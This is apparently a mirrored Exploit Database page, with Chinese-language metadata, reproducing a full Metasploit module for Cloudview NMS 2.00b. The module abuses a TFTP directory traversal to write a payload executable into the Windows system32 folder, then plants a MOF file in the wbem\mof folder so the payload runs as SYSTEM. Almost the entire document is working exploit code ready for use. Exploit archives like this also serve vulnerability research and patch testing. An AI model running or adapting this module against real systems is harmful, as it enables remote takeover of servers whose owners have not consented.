Cloudview NMS 2.00b – Writable Directory Traversal Execution (Metasploit)

• Exploit Database
• 14 阅读

• 作者： James Fitts
  日期： 2017-09-14
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/42725/

• require 'msf/core'
  
  class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  
  include Rex::Proto::TFTP
  include Msf::Exploit::EXE
  include Msf::Exploit::WbemExec
  
  def initialize(info={})
  super(update_info(info,
  'Name' => "Cloudview NMS 2.00b Writable Directory Traversal Execution",
  'Description'=> %q{
  This module exploits a vulnerability found in Cloudview NMS server.The
  software contains a directory traversal vulnerability that allows a remote
  attacker to write arbitrary file to the file system, which results in
  code execution under the context 'SYSTEM'.
  },
  'License'=> MSF_LICENSE,
  'Author' => [ 'james fitts' ],
  'References' =>
  [
  ['URL', '0day']
  ],
  'Payload'=>
  {
  'BadChars' => "\x00",
  },
  'DefaultOptions'=>
  {
  'ExitFunction' => "none"
  },
  'Platform' => 'win',
  'Targets'=>
  [
  [ ' Cloudview NMS 2.00b on Windows', {} ]
  ],
  'Privileged' => false,
  'DisclosureDate' => "Oct 13 2014",
  'DefaultTarget'=> 0))
  
  register_options([
  OptInt.new('DEPTH', [ false, "Levels to reach base directory", 5 ]),
  OptAddress.new('RHOST', [ true, "The remote TFTP server address" ]),
  OptPort.new('RPORT', [ true, "The remote TFTP server port", 69 ])
  ], self.class)
  end
  
  	def upload(filename, data)
  		tftp_client = Rex::Proto::TFTP::Client.new(
  			"LocalHost"=> "0.0.0.0",
  			"LocalPort"=> 1025 + rand(0xffff-1025),
  			"PeerHost" => datastore['RHOST'],
  			"PeerPort" => datastore['RPORT'],
  			"LocalFile"=> "DATA:#{data}",
  			"RemoteFile" => filename,
  			"Mode" => "octet",
  			"Context"=> {'Msf' => self.framework, "MsfExploit" => self },
  			"Action" => :upload
  		)
  
  		ret = tftp_client.send_write_request { |msg| print_status(msg) }
  		while not tftp_client.complete
  			select(nil, nil, nil, 1)
  			tftp_client.stop
  		end
  	end
  
  	def exploit
  		peer = "#{datastore['RHOST']}:#{datastore['RPORT']}"
  
  		exe_name = rand_text_alpha(rand(10)+5) + '.exe'
  		exe= generate_payload_exe
  		mof_name = rand_text_alpha(rand(10)+5) + '.mof'
  		mof= generate_mof(mof_name, exe_name)
  
  		depth= (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']
  		levels = "../" * depth
  
  		print_status("#{peer} - Uploading executable (#{exe.length.to_s} bytes)")
  		upload("#{levels}WINDOWS\\system32\\#{exe_name}", exe)
  
  		select(nil, nil, nil, 1)
  
  		print_status("#{peer} - Uploading .mof...")
  		upload("#{levels}WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof)
  	end
  end